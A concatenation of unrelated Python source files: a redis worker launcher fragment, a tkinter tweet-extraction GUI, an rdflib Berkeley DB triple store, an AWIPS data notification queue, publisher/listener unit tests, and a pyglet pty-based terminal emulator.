logger.info("starting stats worker")
stats_run(args.stats_interval)
redis_jobs = []
def exiter(signal, frame):
for p in redis_jobs:
p.terminate()
logger.info("killed redis worker processes")
logger.info("ghpn-reigns has shutdown!")
exit(0)
logger.info("registering signal handler")
signal.signal(signal.SIGINT, exiter)
logger.info("starting %d redis worker processes" % (args.redis_workers))
for i in range(args.redis_workers):
p = multiprocessing.Process(target=r_worker)
redis_jobs.append(p)
p.start()
|
main.py
|
from tkinter import *
# from date_mangent import date
from date_mangent import DIR
from class_tools import Run
from check_box import Check_box
from check_box import List_box
from time import sleep
from calender import Time
import tkinter
# from ft_twint import Config_twint
from threading import Timer, Thread
from tkinter import font as tkFont
from MainView import MainView
font10="{Courier New} 10 normal"
font11 = {"{U.S. 101} 30 bold"}
font15 = {"{Al-Aramco 11 bold}"}
font16="{Segoe UI} 13 bold"
# fg= "steel blue" "#f2a343" "bg#d9d9d9" "#c60000"
# pyinstaller.exe --onefile -w --hiddenimport=babel.numbers
# pip3 install --user --upgrade git+https://github.com/twintproject/twint.git@origin/master#egg=twint
# pyinstaller --onefile --windowed --icon assets\zahlen_und_code.icn main.py
#
### pyinstaller --onefile --windowed part_manager.py
### pyinstaller --onefile --add-binary='/System/Library/Frameworks/Tk.framework/Tk':'tk' --add-binary='/System/Library/Frameworks/Tcl.framework/Tcl':'tcl' part_manager.py
####key___["Royal Air Maroc" , "@RAM_Maroc", "@RAM_Maroc", \
# "royalairmaroc", "الخطوط المغربيه" , "#الخطوط_الملكية_المغربية "\
# , "الخطوط الملكية المغربية" , "لارام", " لارام"\
# ,"الخطوط_الملكية_المغربية" ]
apps = MainView()
# def main():
# helv36 = tkFont.Font(family='Helvetica', size=36, weight=tkFont.BOLD)
# clander= Time(apps.container)
# clander.main()
# path = DIR(apps.container)
# path.main()
# box = Check_box(apps.container)
# box.main()
# arena = List_box(apps.container)
# arena.main()
# run=Run(apps.container,clander, path, box, arena)
# print("run")
# Thread(target=run.main).start()
# print("end _run")
# btn1 = Button(text='btn1', font=helv36)
# btn1.grid(row=0, column=0, columnspan=1, sticky='EWNS')
def app_init():
apps.title("extracting_tweets")
# apps.iconbitmap('./images/icon.ico')
# apps.iconphoto(True, PhotoImage(file='icon.ico'))
# img = PhotoImage(file='./icon.ico')
# root.tk.call('wm', 'iconphoto', root._w, img)
apps.geometry( '1200x790+0+0')#'950x530+0+0')#750x580+10+10 bg="#091833" 1200x590+0+0'
apps.configure(background="#091833")
if __name__ == "__main__":
app_init()
# main()
apps.mainloop()
|
sleepycat.py
|
from rdflib.store import Store, VALID_STORE, CORRUPTED_STORE, NO_STORE, UNKNOWN
from rdflib.term import URIRef
try:
from bsddb import db
except ImportError:
from bsddb3 import db
from os import mkdir
from os.path import exists, abspath
from urllib import pathname2url
from threading import Thread
import logging
_logger = logging.getLogger(__name__)
class Sleepycat(Store):
context_aware = True
formula_aware = True
transaction_aware = False
def __init__(self, configuration=None, identifier=None):
self.__open = False
self.__identifier = identifier
super(Sleepycat, self).__init__(configuration)
self.configuration = configuration
self._loads = self.node_pickler.loads
self._dumps = self.node_pickler.dumps
self.db_env = None
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier)
def _init_db_environment(self, homeDir, create=True):
envsetflags = db.DB_CDB_ALLDB
envflags = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
if not exists(homeDir):
if create==True:
mkdir(homeDir) # TODO: implement create method and refactor this to it
self.create(homeDir)
else:
return NO_STORE
db_env = db.DBEnv()
db_env.set_cachesize(0, 1024*1024*50) # TODO
#db_env.set_lg_max(1024*1024)
db_env.set_flags(envsetflags, 1)
db_env.open(homeDir, envflags | db.DB_CREATE)
return db_env
def is_open(self):
return self.__open
def open(self, path, create=True):
homeDir = path
if self.__identifier is None:
self.__identifier = URIRef(pathname2url(abspath(homeDir)))
db_env = self._init_db_environment(homeDir, create)
if db_env == NO_STORE:
return NO_STORE
self.db_env = db_env
self.__open = True
dbname = None
dbtype = db.DB_BTREE
# auto-commit ensures that the open-call commits when transactions are enabled
dbopenflags = db.DB_THREAD
if self.transaction_aware == True:
dbopenflags |= db.DB_AUTO_COMMIT
dbmode = 0660
dbsetflags = 0
# create and open the DBs
self.__indicies = [None,] * 3
self.__indicies_info = [None,] * 3
for i in xrange(0, 3):
index_name = to_key_func(i)(("s", "p", "o"), "c")
index = db.DB(db_env)
index.set_flags(dbsetflags)
index.open(index_name, dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__indicies[i] = index
self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
lookup = {}
for i in xrange(0, 8):
results = []
for start in xrange(0, 3):
score = 1
len = 0
for j in xrange(start, start+3):
if i & (1<<(j%3)):
score = score << 1
len += 1
else:
break
tie_break = 2-start
results.append(((score, tie_break), start, len))
results.sort()
score, start, len = results[-1]
def get_prefix_func(start, end):
def get_prefix(triple, context):
if context is None:
yield ""
else:
yield context
i = start
while i<end:
yield triple[i%3]
i += 1
yield ""
return get_prefix
lookup[i] = (self.__indicies[start], get_prefix_func(start, start + len), from_key_func(start), results_from_key_func(start, self._from_string))
self.__lookup_dict = lookup
self.__contexts = db.DB(db_env)
self.__contexts.set_flags(dbsetflags)
self.__contexts.open("contexts", dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__namespace = db.DB(db_env)
self.__namespace.set_flags(dbsetflags)
self.__namespace.open("namespace", dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__prefix = db.DB(db_env)
self.__prefix.set_flags(dbsetflags)
self.__prefix.open("prefix", dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__k2i = db.DB(db_env)
self.__k2i.set_flags(dbsetflags)
self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags|db.DB_CREATE, dbmode)
self.__i2k = db.DB(db_env)
self.__i2k.set_flags(dbsetflags)
self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags|db.DB_CREATE, dbmode)
self.__needs_sync = False
t = Thread(target=self.__sync_run)
t.setDaemon(True)
t.start()
self.__sync_thread = t
return VALID_STORE
def __sync_run(self):
from time import sleep, time
try:
min_seconds, max_seconds = 10, 300
while self.__open:
if self.__needs_sync:
t0 = t1 = time()
self.__needs_sync = False
while self.__open:
sleep(.1)
if self.__needs_sync:
t1 = time()
self.__needs_sync = False
if time()-t1 > min_seconds or time()-t0 > max_seconds:
self.__needs_sync = False
_logger.debug("sync")
self.sync()
break
else:
sleep(1)
except Exception, e:
_logger.exception(e)
def sync(self):
if self.__open:
for i in self.__indicies:
i.sync()
self.__contexts.sync()
self.__namespace.sync()
self.__prefix.sync()
self.__i2k.sync()
self.__k2i.sync()
def close(self, commit_pending_transaction=False):
self.__open = False
self.__sync_thread.join()
for i in self.__indicies:
i.close()
self.__contexts.close()
self.__namespace.close()
self.__prefix.close()
self.__i2k.close()
self.__k2i.close()
self.db_env.close()
def add(self, (subject, predicate, object), context, quoted=False, txn=None):
"""\
Add a triple to the store of triples.
"""
assert self.__open, "The Store must be open."
assert context!=self, "Can not add triple directly to store"
Store.add(self, (subject, predicate, object), context, quoted)
_to_string = self._to_string
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
cspo, cpos, cosp = self.__indicies
value = cspo.get("%s^%s^%s^%s^" % (c, s, p, o), txn=txn)
if value is None:
self.__contexts.put(c, "", txn=txn)
contexts_value = cspo.get("%s^%s^%s^%s^" % ("", s, p, o), txn=txn) or ""
contexts = set(contexts_value.split("^"))
contexts.add(c)
contexts_value = "^".join(contexts)
assert contexts_value!=None
cspo.put("%s^%s^%s^%s^" % (c, s, p, o), "", txn=txn)
cpos.put("%s^%s^%s^%s^" % (c, p, o, s), "", txn=txn)
cosp.put("%s^%s^%s^%s^" % (c, o, s, p), "", txn=txn)
if not quoted:
cspo.put("%s^%s^%s^%s^" % ("", s, p, o), contexts_value, txn=txn)
cpos.put("%s^%s^%s^%s^" % ("", p, o, s), contexts_value, txn=txn)
cosp.put("%s^%s^%s^%s^" % ("", o, s, p), contexts_value, txn=txn)
self.__needs_sync = True
def __remove(self, (s, p, o), c, quoted=False, txn=None):
cspo, cpos, cosp = self.__indicies
contexts_value = cspo.get("^".join(("", s, p, o, "")), txn=txn) or ""
contexts = set(contexts_value.split("^"))
contexts.discard(c)
contexts_value = "^".join(contexts)
for i, _to_key, _from_key in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
if not quoted:
if contexts_value:
for i, _to_key, _from_key in self.__indicies_info:
i.put(_to_key((s, p, o), ""), contexts_value, txn=txn)
else:
for i, _to_key, _from_key in self.__indicies_info:
try:
i.delete(_to_key((s, p, o), ""), txn=txn)
except db.DBNotFoundError, e:
pass # TODO: is it okay to ignore these?
def remove(self, (subject, predicate, object), context, txn=None):
assert self.__open, "The Store must be open."
Store.remove(self, (subject, predicate, object), context)
_to_string = self._to_string
if context is not None:
if context == self:
context = None
if subject is not None and predicate is not None and object is not None and context is not None:
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
value = self.__indicies[0].get("%s^%s^%s^%s^" % (c, s, p, o), txn=txn)
if value is not None:
self.__remove((s, p, o), c, txn=txn)
self.__needs_sync = True
else:
cspo, cpos, cosp = self.__indicies
index, prefix, from_key, results_from_key = self.__lookup((subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
needs_sync = True
except db.DBNotFoundError:
current = None
needs_sync = False
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
current = cursor.next()
except db.DBNotFoundError:
current = None
cursor.close()
if key.startswith(prefix):
c, s, p, o = from_key(key)
if context is None:
contexts_value = index.get(key, txn=txn) or ""
contexts = set(contexts_value.split("^")) # remove triple from all non quoted contexts
contexts.add("") # and from the conjunctive index
for c in contexts:
for i, _to_key, _ in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
else:
self.__remove((s, p, o), c, txn=txn)
else:
break
if context is not None:
if subject is None and predicate is None and object is None:
# TODO: also if context becomes empty and not just on remove((None, None, None), c)
try:
self.__contexts.delete(_to_string(context, txn=txn), txn=txn)
except db.DBNotFoundError, e:
pass
self.__needs_sync = needs_sync
def triples(self, (subject, predicate, object), context=None, txn=None):
"""A generator over all the triples matching """
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
_from_string = self._from_string
index, prefix, from_key, results_from_key = self.__lookup((subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
except db.DBNotFoundError:
current = None
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
current = cursor.next()
except db.DBNotFoundError:
current = None
cursor.close()
if key and key.startswith(prefix):
contexts_value = index.get(key, txn=txn)
yield results_from_key(key, subject, predicate, object, contexts_value)
else:
break
def __len__(self, context=None):
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
if context is None:
prefix = "^"
else:
prefix = "%s^" % self._to_string(context)
index = self.__indicies[0]
cursor = index.cursor()
current = cursor.set_range(prefix)
count = 0
while current:
key, value = current
if key.startswith(prefix):
count +=1
current = cursor.next()
else:
break
cursor.close()
return count
def bind(self, prefix, namespace):
prefix = prefix.encode("utf-8")
namespace = namespace.encode("utf-8")
bound_prefix = self.__prefix.get(namespace)
if bound_prefix:
self.__namespace.delete(bound_prefix)
self.__prefix[namespace] = prefix
self.__namespace[prefix] = namespace
def namespace(self, prefix):
prefix = prefix.encode("utf-8")
return self.__namespace.get(prefix, None)
def prefix(self, namespace):
namespace = namespace.encode("utf-8")
return self.__prefix.get(namespace, None)
def namespaces(self):
cursor = self.__namespace.cursor()
results = []
current = cursor.first()
while current:
prefix, namespace = current
results.append((prefix, namespace))
current = cursor.next()
cursor.close()
for prefix, namespace in results:
yield prefix, URIRef(namespace)
def contexts(self, triple=None):
_from_string = self._from_string
_to_string = self._to_string
if triple:
s, p, o = triple
s = _to_string(s)
p = _to_string(p)
o = _to_string(o)
contexts = self.__indicies[0].get("%s^%s^%s^%s^" % ("", s, p, o))
if contexts:
for c in contexts.split("^"):
if c:
yield _from_string(c)
else:
index = self.__contexts
cursor = index.cursor()
current = cursor.first()
cursor.close()
while current:
key, value = current
context = _from_string(key)
yield context
cursor = index.cursor()
try:
cursor.set_range(key)
current = cursor.next()
except db.DBNotFoundError:
current = None
cursor.close()
def _from_string(self, i):
k = self.__i2k.get(int(i))
return self._loads(k)
def _to_string(self, term, txn=None):
k = self._dumps(term)
i = self.__k2i.get(k, txn=txn)
if i is None:
# weird behavoir from bsddb not taking a txn as a keyword argument
# for append
if self.transaction_aware:
i = "%s" % self.__i2k.append(k, txn)
else:
i = "%s" % self.__i2k.append(k)
self.__k2i.put(k, i, txn=txn)
return i
def __lookup(self, (subject, predicate, object), context, txn=None):
_to_string = self._to_string
if context is not None:
context = _to_string(context, txn=txn)
i = 0
if subject is not None:
i += 1
subject = _to_string(subject, txn=txn)
if predicate is not None:
i += 2
predicate = _to_string(predicate, txn=txn)
if object is not None:
i += 4
object = _to_string(object, txn=txn)
index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
prefix = "^".join(prefix_func((subject, predicate, object), context))
return index, prefix, from_key, results_from_key
def to_key_func(i):
def to_key(triple, context):
"Takes a string; returns key"
return "^".join((context, triple[i%3], triple[(i+1)%3], triple[(i+2)%3], "")) # "" to tac on the trailing ^
return to_key
def from_key_func(i):
def from_key(key):
"Takes a key; returns string"
parts = key.split("^")
return parts[0], parts[(3-i+0)%3+1], parts[(3-i+1)%3+1], parts[(3-i+2)%3+1]
return from_key
def results_from_key_func(i, from_string):
def from_key(key, subject, predicate, object, contexts_value):
"Takes a key and subject, predicate, object; returns tuple for yield"
parts = key.split("^")
if subject is None:
# TODO: i & 1: # dis assemble and/or measure to see which is faster
# subject is None or i & 1
s = from_string(parts[(3-i+0)%3+1])
else:
s = subject
if predicate is None:#i & 2:
p = from_string(parts[(3-i+1)%3+1])
else:
p = predicate
if object is None:#i & 4:
o = from_string(parts[(3-i+2)%3+1])
else:
o = object
return (s, p, o), (from_string(c) for c in contexts_value.split("^") if c)
return from_key
def readable_index(i):
s, p, o = "?" * 3
if i & 1: s = "s"
if i & 2: p = "p"
if i & 4: o = "o"
return "%s,%s,%s" % (s, p, o)
|
DataQueue.py
|
# #
# #
#
# Convenience class for using the DAF's notifications feature. This is a
# collection that, once connected to EDEX by calling start(), fills with
# data as notifications come in. Runs on a separate thread to allow
# non-blocking data retrieval.
#
#
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 07/29/16 2416 tgurney Initial creation
#
from awips.dataaccess import DataNotificationLayer as DNL
import time
from threading import Thread
import sys
if sys.version_info.major == 2:
from Queue import Queue, Empty
else: # Python 3 module renamed to 'queue'
from queue import Queue, Empty
"""Used to indicate a DataQueue that will produce geometry data."""
GEOMETRY = object()
"""Used to indicate a DataQueue that will produce grid data."""
GRID = object()
"""Default maximum queue size."""
_DEFAULT_MAXSIZE = 100
class Closed(Exception):
"""Raised when attempting to get data from a closed queue."""
pass
class DataQueue(object):
"""
Convenience class for using the DAF's notifications feature. This is a
collection that, once connected to EDEX by calling start(), fills with
data as notifications come in.
Example for getting obs data:
from DataQueue import DataQueue, GEOMETRY
request = DataAccessLayer.newDataRequest('obs')
request.setParameters('temperature')
request.setLocationNames('KOMA')
q = DataQueue(GEOMETRY, request)
q.start()
for item in q:
print(item.getNumber('temperature'))
"""
def __init__(self, dtype, request, maxsize=_DEFAULT_MAXSIZE):
"""
Create a new DataQueue.
Args:
dtype: Either GRID or GEOMETRY; must match the type of data
requested.
request: IDataRequest describing the data you want. It must at
least have datatype set. All data produced will satisfy the
constraints you specify.
maxsize: Maximum number of data objects the queue can hold at
one time. If the limit is reached, any data coming in after
that will not appear until one or more items are removed using
DataQueue.get().
"""
assert maxsize > 0
assert dtype in (GEOMETRY, GRID)
self._maxsize = maxsize
self._queue = Queue(maxsize=maxsize)
self._thread = None
if dtype is GEOMETRY:
self._notifier = DNL.getGeometryDataUpdates(request)
elif dtype is GRID:
self._notifier = DNL.getGridDataUpdates(request)
def start(self):
"""Start listening for notifications and requesting data."""
if self._thread is not None:
# Already started
return
kwargs = {'callback': self._data_received}
self._thread = Thread(target=self._notifier.subscribe, kwargs=kwargs)
self._thread.daemon = True
self._thread.start()
timer = 0
while not self._notifier.subscribed:
time.sleep(0.1)
timer += 1
if timer >= 100: # ten seconds
raise RuntimeError('timed out when attempting to subscribe')
def _data_received(self, data):
for d in data:
if not isinstance(d, list):
d = [d]
for item in d:
self._queue.put(item)
def get(self, block=True, timeout=None):
"""
Get and return the next available data object. By default, if there is
no data yet available, this method will not return until data becomes
available.
Args:
block: Specifies behavior when the queue is empty. If True, wait
until an item is available before returning (the default). If
False, return None immediately if the queue is empty.
timeout: If block is True, wait this many seconds, and return None
if data is not received in that time.
Returns:
IData
"""
if self.closed:
raise Closed
try:
return self._queue.get(block, timeout)
except Empty:
return None
def get_all(self):
"""
Get all data waiting for processing, in a single list. Always returns
immediately. Returns an empty list if no data has arrived yet.
Returns:
List of IData
"""
data = []
for _ in range(self._maxsize):
next_item = self.get(False)
if next_item is None:
break
data.append(next_item)
return data
def close(self):
"""Close the queue. May not be re-opened after closing."""
if not self.closed:
self._notifier.close()
self._thread.join()
def qsize(self):
"""Return number of items in the queue."""
return self._queue.qsize()
def empty(self):
"""Return True if the queue is empty."""
return self._queue.empty()
def full(self):
"""Return True if the queue is full."""
return self._queue.full()
@property
def closed(self):
"""True if the queue has been closed."""
return not self._notifier.subscribed
@property
def maxsize(self):
"""
Maximum number of data objects the queue can hold at one time.
If this limit is reached, any data coming in after that will not appear
until one or more items are removed using get().
"""
return self._maxsize
def __iter__(self):
if self._thread is not None:
while not self.closed:
yield self.get()
def __enter__(self):
self.start()
return self
def __exit__(self, *unused):
self.close()
|
test_publisher.py
|
import unittest
import time
from uphone.publisher import Publisher
from uphone.listener import Listener
from multiprocessing import Process
from multiprocessing import Array
def run_listener(data, n_messages):
client = Listener('0.0.0.0')
for i, message in zip(range(n_messages), client):
data[i] = int(message)
def slowed_range():
for i in range(10):
time.sleep(0.01)
yield str(i).zfill(3)
class TestPublisher(unittest.TestCase):
def setUp(self):
self.pub = Publisher()
def tearDown(self):
self.pub.close()
def build_listener(self, n_messages):
data = Array('d', [0.0]*n_messages)
client = Process(target=run_listener, args=(data, n_messages))
client.start()
return client, data
def test_sending(self):
self.pub._send_to_clients('abc')
def test_distributing_of_generator(self):
client, data = self.build_listener(5)
self.pub.send(gen=slowed_range, connection_interval=5)
client.join()
self.assertListEqual(
data[:], [5, 6, 7, 8, 9])
def test_multiple_check_for_connections(self):
client, data = self.build_listener(8)
self.pub.send(gen=slowed_range, connection_interval=2)
client.join()
self.assertListEqual(
data[:], [2, 3, 4, 5, 6, 7, 8, 9])
def test_client_failover(self):
# Build client that only fetches two messages
client, data = self.build_listener(2)
self.pub.send(gen=slowed_range, connection_interval=3)
client.join()
self.assertListEqual(
data[:], [3, 4])
def test_server_failover(self):
# TODO: Test if the server crashes
pass
def test_multiple_clients(self):
self.skipTest(
'Somehow, this test does not work in Docker instance spawned by Travis '
'but on pyboard and locally. Do we have deeper design problems somewhere?')
client_b, data_b = self.build_listener(5)
client_a, data_a = self.build_listener(2)
self.pub.send(gen=slowed_range, connection_interval=3)
for client in [client_a, client_b]:
client.terminate()
client.join()
self.assertListEqual(
data_a[:], [3.0, 4.0])
self.assertListEqual(
data_b[:], [3.0, 4.0, 5.0, 6.0, 7.0])
|
term.py
|
SIZE = 10
HEIGHT = 40
WIDTH = 140
import time
import cProfile
import sys
import os
import pty
import fcntl
import termios
import struct
import threading
from collections import deque
from functools import partial
from weakref import WeakKeyDictionary
from pprint import pprint
import pyglet
from pyglet.window import key
def thread(fun):
def s(*args, **kwargs):
t = threading.Thread(target=lambda: fun(*args), **kwargs)
t.start()
return t
return s
symbols = {
key.BACKSPACE: "", key.UP: "OA",
key.DOWN: "OB", key.LEFT: "OD",
key.RIGHT: "OC", key.HOME: "OH",
key.END: "OF", key.PAGEUP: "[5~",
key.PAGEDOWN:"[6~",key.F1: "OP",
key.F2: "OQ", key.F3: "OR",
key.F4: "OS", key.F5: "OT",
key.F6: "OU", key.F7: "OV",
key.F8: "OW", key.F9: "OX",
key.F10: "OY", key.F11: "OZ",
key.F12: "[24~",key.ESCAPE: "",
key.TAB: "\t",
}
application_symbols = {
key.NUM_ENTER:"OM", key.NUM_1: "Op",
key.NUM_2: "Oq", key.NUM_3: "Or",
key.NUM_4: "Os", key.NUM_5: "Ot",
key.NUM_5: "Ou", key.NUM_6: "Ov",
key.NUM_7: "Ow", key.NUM_8: "Ox",
key.NUM_9: "Oy",
}
class DefAttr:
def __init__(self, default=lambda obj: None, **kwargs):
super().__init__(**kwargs)
self.default = default
def __get__(self, obj, type_=None):
try:
return super().__get__(obj, type_)
except KeyError:
return self.default(obj)
class Descriptor:
"""Allows a class to check before an attribute is retrieved,
or to update after it has been changed.
Also defaults
"""
def __init__(self, onset=lambda obj: None, onget=lambda obj, val:val, default=None):
self.onset = onset
self.onget = onget
self.vals = WeakKeyDictionary()
self.default = default
def __get__(self, obj, type_=None):
val = self.vals.get(obj, self.default)
return self.onget(obj, val)
def __set__(self, obj, value):
self.vals[obj] = value
self.onset(obj)
class Bound(Descriptor):
"""On top of the functionallity provided by Descriptor, Bound ensures that
all values assigned to an attribute stay above or equal to the result of
low, and below or equal to the result of high. Bounds start as 0 through
inf.
"""
@staticmethod
def constrain(val, low=None, high=None):
pick = max(val, low) if low is not None else val
return min(pick, high) if high is not None else pick
def __init__(self, high=lambda obj:None, low=lambda obj:0, **kw):
super().__init__(**kw)
self.high = high
self.low = low
def __set__(self, obj, value):
Descriptor.__set__(self, obj, self.constrain(value, self.low(obj), self.high(obj)))
class Line:
@Descriptor
def text(self):
self.dirty = True
def __init__(self, text=""):
self.dirty = True
self.text = ""
self.graphics = []
class Term:
@Descriptor
def dims(self):
self.update_size()
@property
def width(self):
return self.dims[1]
@width.setter
def set_width(self, val):
self.dims = (self.height, val)
@property
def height(self):
return self.dims[0]
@height.setter
def set_height(self, val):
self.dims = (val, self.width)
def margin_height(self):
return self.height-1
def margin_onset(self):
self.row = self.row #descriptor magic
margin_top = Bound(margin_height, onset=margin_onset)
margin_bottom = Bound(margin_height, onset=margin_onset)
row = Bound(high=lambda self: self.margin_top,
low=lambda self: self.margin_bottom,
default=0)
col = Bound()
def label(self, text, y, batch=None):
return pyglet.text.Label(
text,
batch=batch,
font_size=self.font_size,
font_name=self.font_name,
x=1, y=y * self.font_height + 1,
anchor_x='left', anchor_y='bottom',
)
def __init__(self, width, height, font_size, shell="/bin/bash", font_name="SourceCodePro for Powerline"):
self.fd = self.fork_pty(shell, shell, "-i")
self.chars = deque()
self.font_name = font_name
self.font_size = font_size
self.font_height = 0#temporary
temp_label = self.label("█", 0)
self.font_height = temp_label.content_height
self.font_width = temp_label.content_width
self.lines = [""]*height
self.dirty = set()
self.batch = None
self.dims = (height, width) #initialises batch
self.margin_top = self.height - 1 #TODO: top margin should follow height
self.margin_bottom = 0
self.row = 0
self.col = 0
self.window = pyglet.window.Window(width=self.width*self.font_width,
height=self.height*self.font_height,
resizable=True)
self.window.event(self.on_draw)
self.window.event(self.on_mouse_scroll)
self.window.event(self.on_key_press)
self.window.event(self.on_text)
self.window.event(self.on_resize)
self.saved_cursor = (self.row, self.col)
self.modes = {
"application": False,
"edit": False,
"cursor": True,
"vertical": False,
"insert": False,
"autowrap": False,
"mouse": False,
}
self.lock = threading.Lock()
self.actor = self.act(self.fill(), self.lock)
def start(self):
pyglet.clock.schedule(self.redraw)
pyglet.app.run()
def on_draw(self):
self.window.clear()
self.draw_cursor()
for d in self.dirty:
if d < self.height:
self.labels[d].text = self.lines[d]
self.batch.draw()
self.window.invalid = False
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
if not self.modes["mouse"]:
if scroll_y < 0:
self.write(''*-scroll_y)
elif scroll_y > 0:
self.write(''*scroll_y)
else:
if scroll_y < 0:
self.write('\x1b[Ma%c%c'%(32+x//self.font_width,32+y//self.font_height)*-scroll_y)
elif scroll_y > 0:
self.write('\x1b[M`%c%c'%(32+x//self.font_width,32+y//self.font_height)*scroll_y)
def on_key_press(self, symbol, modifiers):
if modifiers & key.MOD_CTRL and 96 < symbol <= 122:
self.write(chr(symbol - 96))
elif symbol in symbols:
self.write(symbols[symbol])
elif self.modes["application"] and symbol in application_symbols:
self.write(application_symbols[symbol])
else:
print("unknown", symbol, hex(modifiers))
return
return pyglet.event.EVENT_HANDLED
def on_text(self, text):
self.write(text)
def on_resize(self, width, height):
self.dims = height//self.font_height, width//self.font_width
def redraw(self, dt):
if not self.actor.is_alive():
self.close()
if self.window.invalid:
self.lock.acquire(blocking=True)
self.window.dispatch_event("on_draw")
self.lock.release()
def fork_pty(self, prog, *args):
child_pid, fd = pty.fork()
if child_pid == 0:
sys.stdout.flush()
os.execlp(prog, *args)
else:
return fd
def write(self, item):
os.write(self.fd, item.encode("utf-8"))
def update_size(self):
self.batch = pyglet.graphics.Batch()
diff = self.height - len(self.lines)
if diff > 0:
self.lines += [""]*diff
elif diff < 0:
self.lines = self.lines[:diff]
self.labels = [
self.label(self.lines[i], i, self.batch)
for i in range(self.height)
]
fcntl.ioctl(self.fd, termios.TIOCSWINSZ,
struct.pack("HHHH", self.height, self.width, 0, 0))
def fill(self):
data = b""
while True:
try:
data += os.read(self.fd, 10000)
try:#we might sometimes get data that ends in the middle of a
#unicode glyph. In that case we need to wait. However,
#UnicodeDecodeError can occur in many other cases. C'est la
#vie. ¯\_(ツ)_/¯
yield from data.decode("utf-8")
print()
except UnicodeDecodeError:
pass
else:
data = b""
except OSError:
break
def close(self):
pyglet.app.exit()
def draw_cursor(self):
if not self.modes["cursor"]:
return
x, y = self.col*(self.font_width), (self.row) * (self.font_height),
pyglet.graphics.draw(4, pyglet.gl.GL_QUADS,
('v2f', [
x, y,
x+self.font_width, y,
x+self.font_width, y+self.font_height,
x, y+self.font_height]),
("c3B", [200]*12))
def insert_line(self, index, data):
self.lines.pop()
self.lines.insert(index, data)
self.dirty.update(range(index, self.height))
def insert(self, chars):
print(chars, end="")
l = self.lines[self.row]
if self.modes["insert"]:
self.lines[self.row] = l[:self.col].ljust(self.col, " ") + chars + l[self.col:]
else:
self.lines[self.row] = l[:self.col].ljust(self.col, " ") + chars + l[self.col+len(chars):]
self.col += len(chars)
if len(l) >= self.width:
if self.modes["autowrap"]:
self.insert_line(0, "")
self.col = 0
self.insert(self.lines[self.row][self.width:])
self.splice(self.width, None, self.row + 1)
self.dirty.add(self.row+1)
else:
self.splice(self.width, None, self.row)
self.dirty.add(self.row)
def remove(self, index):
self.lines.pop(index)
self.lines.append("")
self.dirty.update(range(index, self.height))
def splice(self, start, end, row=None):#doesn't update col
row = row if row is not None else self.row
l = self.lines[row]
self.lines[row] = l[:start] + (l[end:] if end is not None else "")
self.dirty.add(row)
def csi(self, chars):
coms = [0]
follow = next(chars)
query = ""
if follow in "<=>?":
query = follow
follow = next(chars)
while follow in "0123456789;":
if follow == ";":
coms.append(0)
else:
coms[-1] *= 10
coms[-1] += int(follow)
follow = next(chars)
if follow not in "m":
print("'CSI", query, coms, follow, "'", sep="", end="")
if follow == "A":
self.row -= coms[0] or 1
elif follow == "B":
self.row += coms[0] or 1
elif follow == "C":
self.col += coms[0] or 1
elif follow == "D":
self.col -= coms[0] or 1
elif follow == "G":
self.col = max(coms[0]-1, 0)
elif follow == "H":
self.row = self.height - (coms[0] or 1)
if len(coms)>1:
self.col = coms[1] - 1
else:
self.col = 0
elif follow == "J":
if coms[0] in (0, 2):
self.splice(self.col, None)
for i in range(self.row -1, -1, -1):
self.splice(0, None, i)
if coms[0] in (1, 2):
self.splice(0, self.col)
for i in range(self.row+1, min(self.height+self.row, len(self.lines))):
self.splice(0, None, i)
elif follow == "K":
if coms[0] == 0:
self.splice(self.col, None)
elif coms[0] == 1:
self.splice(0, self.col)
elif coms[0] == 2:
self.splice(0, None)
elif follow == "L":#IL, insert line
self.remove(self.margin_bottom)
self.insert_line(self.row+1, "")
#self.insert_line(self.row, "")
elif follow == "M":#reMove line
for i in range(coms[0] or 1):
self.remove(self.row)
self.insert_line(self.margin_bottom, "")
elif follow == "P":
self.splice(self.col, self.col + coms[0] if coms[0] > 0 else None)
elif follow == "S":
for _ in range(coms[0] or 1):
self.insert_line(self.margin_bottom, "")
elif follow == "T":
for _ in range(coms[0] or 1):
self.remove(self.margin_bottom)
self.insert_line(self.margin_top, "")
elif follow == "X":
amount = coms[0] or 1
self.splice(self.col, self.col + amount)
self.insert(" " * amount)
elif follow == "Z": #back one tab
self.col //= 8
self.col -= coms[0]
self.col *= 8
elif follow == "d":
self.row = self.height - coms[0]
pass
elif follow == "c" and query == ">":#secondary DA
pass#self.write("\x1b[>0;136;0c") # what putty does
#https://github.com/FauxFaux/PuTTYTray/blob/1c88744f64405fbc024a15712969b083be4bc72c/terminal.c#L3548
elif follow in "lh":
if follow == "l":
state = False
elif follow == "h":
state = True
if coms[0] == 4 and query == "":
self.modes["insert"] = state
if coms[0] == 7 and query == "": #VEN
self.modes["vertical"] = state
elif coms[0] == 7 and query == "?":
self.modes["autowrap"] = state
if coms[0] == 25:#DECTCEM on
self.modes["cursor"] = state
elif coms[0] == 1000:#xterm mouse 1
self.modes["mouse"] = state
elif coms[0] == 1049:#local edit mode
self.modes["edit"] = state
